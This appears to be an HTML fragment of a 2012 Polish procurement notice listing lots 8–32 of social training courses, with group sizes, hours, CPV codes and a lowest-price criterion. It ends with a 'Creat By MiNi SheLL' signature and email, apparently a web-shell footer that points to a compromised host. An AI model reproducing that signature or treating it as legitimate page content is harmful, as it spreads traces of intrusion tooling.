<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Podniesienie umiejętności remontowych (malarz-tapeciarz) I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla 20 osób, łącznie 104 h zajęć grupowych, część w podziale na dwie grupy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zajęcia z młodzieżą zagrożoną wykluczeniem społecznym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zrealizowanie 47 h zajęć grupowych, dla 20 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> - Podniesienie umiejętności opieki nad dzieckiem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zrealizowanie 56 h zajęć grupowych, dla 1 grupy, (20 osób w grupie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zajęcia w zakresie podniesienia umiejętności wykonywania drobnych prac remontowych I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 20 osób, łącznie zrealizowanie 84 h zajęć grupowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zajęcia w zakresie podniesienia umiejętności obsługi komputera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 20 osób, łącznie zrealizowanie 84 h zajęć grupowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zajęcia w zakresie podnoszenia umiejętności efektywnej nauki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla 20 osób, łącznie 100 h.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zajęcia z osobami zaburzonymi psychicznie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla 1 grupy, 20 osób, 
łącznie zrealizowanie 48 h zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Podniesienie umiejętności ekonomicznego gotowania II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2 grupy -grupa A i grupa B - każda po 15 osób - łącznie 30 osób, 
łącznie zrealizowanie 180 h zajęć grupowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Podniesienie umiejętności remontowych -malarz-tapeciarz II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla 20 osób, łącznie 104 h zajęć grupowych, część w podziale na dwie grupy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Podniesienie umiejętności w zakresie kompetencji wychowawczych i obsługi komputera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 grupa - 20 osób, 
Zrealizowanie 48 godzin zajęć grupowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> - Podniesienie umiejętności w zakresie kompetencji życiowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 grupa - 20 osób, 
Zrealizowanie 48 godzin zajęć grupowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zajęcia dla osób bezdomnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zrealizowanie 46 h zajęć grupowych, dla 20 osób -1 grupa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Program Aktywności Lokalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kursy i zajęcia podnoszące kompetencje o charakterze zawodowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zajęcia dla młodzieży z placówek opiekuńczo-wychowawczych i usamodzielnionych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3 grupy (A, B i C), każda max. 17 osób, łącznie 47 osób,
zrealizowanie 30 h szkolenia grupowego dla 3 grup.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Zajęcia dla osób z rodzin zastępczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3 grupy -grupa A, B i C- każda po 10 osób - łącznie 30 osób, 
łącznie zrealizowanie 90 h zajęć grupowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Zajęcia dla rodziców z problemami op-wych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zrealizowanie 120 h zajęć grupowych, dla 10 osób  -1 grupa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Podniesienie umiejętności pracy z osobami niepełnosprawnymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 50 osób, w podziale na 2 grupy:
grupa I: 25 osób - 612 h, w tym: 525 h zajęć indywidualnych i 87 h zajęć grupowych;
grupa II: 25 osób - 876 h, w tym: 825 h zajęć indywidualnych i 51 h zajęć grupowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Podniesienie umiejętności w zakresie rozwiązywania sporów i konfliktów w rodzinie bez używania przemocy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 grupa, 10 osób
Zrealizowane  72  h zajęć grupowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Profilaktyka zachowań społecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 grupa, 10 osób;
66 h zajęć grupowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Zajęcia dla osób dotkniętych problemem przemocy w rodzinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 grupa, 10 osób;
zrealizowanie 61 h zajęć grupowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Zajęcia dla osób z rodzin dotkniętych problemem alkoholowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 grupa, 10 osób;
166 h zajęć grupowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Podniesienie umiejętności psychologiczno-społecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 grupa, 10 osób
Zrealizowanie 46 h zajęć grupowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Skierowanie na zajęcia do szkoły.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zrealizowanie następujących zajęć dla 1 osoby:

1. skierowanie na zajęcia do szkoły - sfinansowanie czesnego za jeden rok szkolny nauki;
2. zajęcia z doradcą zawodowym - 2 h;
3. zajęcia z psychologiem - 2 h..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Zajęcia z elementami TSR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zrealizowanie 24 h zajęć grupowych, dla 10 osób (1 grupa).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Zajęcia z asystentem rodzinnym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 10 osób, zajęcia w trybie zindywidualizowanym
Zrealizowanie 720 h zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com